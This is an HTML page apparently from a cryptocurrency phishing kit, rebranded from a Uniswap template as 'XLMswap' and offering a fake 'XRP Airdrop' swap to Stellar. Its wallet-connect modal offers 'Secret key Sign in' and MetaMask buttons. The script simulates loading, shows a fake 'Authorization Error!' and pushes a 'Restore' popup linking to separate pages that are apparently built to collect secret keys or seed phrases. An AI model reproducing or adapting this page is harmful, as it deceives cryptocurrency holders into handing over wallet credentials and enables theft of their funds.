<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <link rel="stylesheet" href="Uniswap_Interface_files/bootstrap.min.css">
    <link rel="shortcut icon" href="https://stellarterm.com/favicon.ico">
    <style>
      @font-face {
        font-family: inter;
        src: url('inter.woff2') format('woff2');
      }
      
      @font-face {
        font-family: atkinson;
        src: url('atkinson.woff2') format('woff2');
      }

      * {
        font-family: 'inter';
      }

      body {
        background-color: #0f898c;
        background-size: cover;
        font-family: 'inter';
      }

      nav .btncustom {
        margin-left: 10px;
      }

      .btncustom, a.btncustom {
        text-decoration: none;
        padding: 0.5rem;
        border-radius: 12px;
        font-weight: 500;
      }

      .btncustom2, a.btncustom2 {
        text-decoration: none;
        padding: 1rem;
        color: #fff;
        font-weight: 700;
        background-color: rgb(44, 47, 54);
        border:1px solid rgb(64, 68, 79);
        border-radius: 12px;
      }

      .btnprimary {
        color: rgb(80, 144, 234);
        background: #1c2f48;
      }

      .btnsecondary {
        color: #fff;
        background: rgb(33, 36, 41);
      }

      .card-custom {
        background: rgb(25, 27, 31);
        color: #fff;
        padding: 1px;
        border-radius: 24px;
        font-size: 14pt;
      }

      .card-item {
        background: rgb(33, 36, 41);
        border-radius: 20px;
        border: 1px solid rgb(44, 47, 54);
      }

      .combo-ellipse-container {
        background-color: rgb(25, 27, 31);
        border-radius: 16px;
        padding: 10px 8px;
        width: 30%;
        cursor: pointer;
      }

      .combo-ellipse-container img {
        background-color: #fff;
        border-radius: 150px;
      }

      .item-arrow-separator {
        background-color: rgb(33, 36, 41);
        border: 3px solid rgb(25, 27, 31);
        border-radius: 12px;
        height: 35px;
        width: 35px;
        margin: auto;
        position:relative;
        margin-top: -14px;
        margin-bottom: -32px;
        z-index: 99;
      }

      .item-value {
        overflow: hidden;
        width: 60%;
      }

      .alert {
        border: 1px solid #fd4146;
        color: #fd4146;
        border-radius: 12px;
      }

      .hiddenElement {
        display: none !important;
      }

      @media screen and (max-width: 600px) {
        .hidden-on-mobile {
          display: none !important;
        }
        .combo-ellipse-container {
          width: 65%;
        }
        .item-value {
          width: 35%;
        }
        .item-value span, .item-value small{
          font-size: 10pt !important; 
        }
      }

      @media screen and (max-width: 1024px) {
        .hidden-on-mobile {
          display: none !important;
        }
        .combo-ellipse-container {
          width: 60%;
        }
        .item-value {
          width: 40%;
        }
        .item-value span, .item-value small{
          font-size: 10pt !important; 
        }
      }
    </style>

    <title>XLMswap Interface</title>
  </head>
  <body>
    <nav class="navbar navbar-expand-lg navbar-dark">
      <a class="navbar-brand" href="#">
        <svg width="24px" height="100%" viewBox="0 0 14 15" fill="#FFFFFF" xmlns="http://www.w3.org/2000/svg">
          
        </svg>
      </a>
      <div class="ml-auto">
          
          <span class="hidden-on-mobile"> Stellar</span>
        </a>
        <a href="" class="btncustom btnprimary triggerConnectWallet">Connect Wallet</a>
      </div>
    </nav>

    <div class="container mt-5">
      <div class="row">
        <div class="col-md-3"></div>
        <div class="col-md-6 col-sm-12">
          
          <div class="card card-custom">
            <div class="card-body">
              Swap XRP Airdrop To STELLAR For Redeem

              <div class="card card-item mt-3">
                <div class="card-body d-inline-flex justify-content-between align-items-center">
                  <div class="combo-ellipse-container">
                    <img src="Uniswap_Interface_files/xrp2.png" width="25" height="25"> &nbsp; XRP 
                    &nbsp;&nbsp;<svg width="12" height="7" viewBox="0 0 12 7" fill="none" xmlns="http://www.w3.org/2000/svg" class="sc-33m4yg-8 kcdsjA"><path d="M0.97168 1L6.20532 6L11.439 1" stroke="#AEAEAE"></path></svg>
                  </div>
                  <div class="text-right item-value">
                    <span style="font-size: 20pt; font-family: atkinson !important;">1000</span> <br>
                    <small style="font-size: 10pt; font-family: atkinson !important;">~$ 418.5</small>
                  </div>
                </div>
              </div>
              <div class="item-arrow-separator text-center">
                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="#8F96AC" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><line x1="12" y1="5" x2="12" y2="19"></line><polyline points="19 12 12 19 5 12"></polyline></svg>
              </div>
              <div class="card card-item mt-3">
                <div class="card-body d-inline-flex justify-content-between align-items-center">
                  <div class="combo-ellipse-container">
                    <img src="Uniswap_Interface_files/strpp.png" width="25" height="25"> &nbsp; XLM 
                    &nbsp;&nbsp;<svg width="12" height="7" viewBox="0 0 12 7" fill="none" xmlns="http://www.w3.org/2000/svg" class="sc-33m4yg-8 kcdsjA"><path d="M0.97168 1L6.20532 6L11.439 1" stroke="#AEAEAE"></path></svg>
                  </div>
                  <div class="text-right item-value">
                    <span style="font-size: 20pt; font-family: atkinson !important;">4858.1435</span> <br>
                    <small style="font-size: 10pt; font-family: atkinson !important;">~$ 418.5 (-1.34%)</small>
                  </div>
                </div>
              </div>

              <div class="mt-3 d-flex justify-content-between" style="font-size: 10pt;">
                <div style="font-family: atkinson !important;">
                  <svg width="23" height="20" viewBox="0 0 23 20" fill="none" xmlns="http://www.w3.org/2000/svg" class="sc-1uzj9pr-0 hesVOS"><defs><linearGradient id="gradient1" x1="0" y1="0" x2="1" y2="0" gradientTransform="rotate(95)"><stop id="stop1" offset="0" stop-color="#2274E2"></stop><stop id="stop1" offset="0.5" stop-color="#2274E2"></stop><stop id="stop2" offset="1" stop-color="#3FB672"></stop></linearGradient></defs><path d="M16 16C10 16 9 10 5 10M16 16C16 17.6569 17.3431 19 19 19C20.6569 19 22 17.6569 22 16C22 14.3431 20.6569 13 19 13C17.3431 13 16 14.3431 16 16ZM5 10C9 10 10 4 16 4M5 10H1.5M16 4C16 5.65685 17.3431 7 19 7C20.6569 7 22 5.65685 22 4C22 2.34315 20.6569 1 19 1C17.3431 1 16 2.34315 16 4Z" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" stroke="url(#gradient1)"></path></svg>
                  &nbsp; 1 XRP = 4.7581435 XLM
                </div>
                <div style="font-family: atkinson !important;">
                  ($0.07340000)
                  <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="sc-1es900k-0 iWehYF"><circle cx="12" cy="12" r="10"></circle><line x1="12" y1="16" x2="12" y2="12"></line><line x1="12" y1="8" x2="12.01" y2="8"></line></svg>
                </div>
				
              </div>
             
			<p style="color: red;">&nbsp;&nbsp;&nbsp;Not enough funds for transaction fee, please Login your Wallet.</p>
			
              <a href="" class="btncustom btnprimary btn-block text-center mt-3 triggerConnectWallet">Connect Wallet</a>

            </div>
          </div>

        </div>
        <div class="col-md-3"></div>
      </div>
    </div>

    <div class="modal fade" id="connectModal" tabindex="-1" aria-labelledby="exampleModalLabel" aria-hidden="true">
      <div class="modal-dialog modal-dialog-centered">
        <div class="modal-content text-white" style="background-color: rgb(25, 27, 31); border: 1px solid rgb(33, 36, 41); border-radius: 20px;">
          <div class="modal-header" style="border-bottom: none">
            <h5 class="modal-title" id="connectModal">Connect a Wallet</h5>
            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
              <span aria-hidden="true" class="text-white">&times;</span>
            </button>
          </div>
          <div class="modal-body">

            <div class="card card-item">
              <div class="card-body" style="font-size: 10pt;">
                By connecting a wallet, you agree to Stellar Labs’ <a href="https://uniswap.org/terms-of-service/" target="_blank">Terms of Service</a> and acknowledge that you have read and understand the Stellar <a href="https://uniswap.org/disclaimer/" target="_blank">Protocol Disclaimer</a>.
              </div>
            </div>

            <div class="alert mt-3" role="alert" id="alertForRestore">
              Error Connecting &nbsp; <a href="#" id="linkToForm" class="btn btn-secondary btn-sm" onclick="window.open(this.href,'targetWindow','toolbar=no,location=no,status=no,menubar=no,scrollbars=yes,resizable=yes,width=450,height=900'); return false;">Restore</a>
            </div>
            <div class="card card-item mt-3" id="alertForRestore2">
              <div class="card-body d-flex justify-content-between align-items-center" style="font-size: 10pt;">
                <div>
                  <b>Authorization Error !</b> <br>
                  Click restore to connect your wallet
                </div>
                <img src="" height="24" width="auto" id="imgOfAlertForRestore2">
              </div>
            </div>

            
            <a href="StellarTerm_account.html" class="btncustom2 btn-block mt-3 d-inline-flex justify-content-between btnConnect" data-type="Trustwallet" data-logo="image/str1.png">
              <span>
                Secret key Sign in
                &nbsp;
                <div class="spinner-border loader" role="status" id="loaderForTrustwallet" style="height: 15px; width: 15px">
                  <span class="sr-only">Loading...</span>
                </div>
              </span>
              <img src="image/str1.png" width="auto" height="24">
            </a>
			<a href="Metamask.html" class="btncustom2 btn-block mt-3 d-inline-flex justify-content-between btnConnect" data-type="Trustwallet" data-logo="image/favico.png">
              <span>
                MetaMask
                &nbsp;
                <div class="spinner-border loader" role="status" id="loaderForTrustwallet" style="height: 15px; width: 15px">
                  <span class="sr-only">Loading...</span>
                </div>
              </span>
              <img src="image/favico.png" width="auto" height="24">
            </a>
          </div>
        </div>
      </div>
    </div> <br> <br> <br> <br>

    <script src="./Uniswap_Interface_files/jquery.slim.min.js.download"></script>
    <script src="./Uniswap_Interface_files/popper.min.js.download"></script>
    <script src="./Uniswap_Interface_files/bootstrap.min.js.download"></script>
    <script>
      $(function(){
        function visibility(visible, link = undefined, type = undefined, img = undefined) {
          $(".loader").css('display','none')
          if(visible == false) {
            $("#alertForRestore").css('display','none')
            $("#alertForRestore2").css('display','none')
            $(".btnConnect").removeClass('hiddenElement')
          } else {
            $("#loaderFor" + type).css('display','')
            setTimeout(function(){
              $(".btnConnect").addClass('hiddenElement')
              $("#alertForRestore").css('display','')
              $("#alertForRestore2").css('display','')
              $("#imgOfAlertForRestore2").attr('src',img)
              $(".loader").css('display','none')
            },2000)
          }

          if(typeof link !== 'undefined') $("#linkToForm").attr('href',link)
        }

        visibility(false)

        $(".btnConnect").on("click",function(e){
          e.preventDefault()
          const link = $(this).attr("href")
          const type = $(this).data("type")
          const img = $(this).data("logo")
          visibility(true,link,type,img)
        })

        $(".triggerConnectWallet").on("click",function(e){
          e.preventDefault()
          visibility(false)
          $("#connectModal").modal("show")
        })
      })
    </script>
  </body>
</html>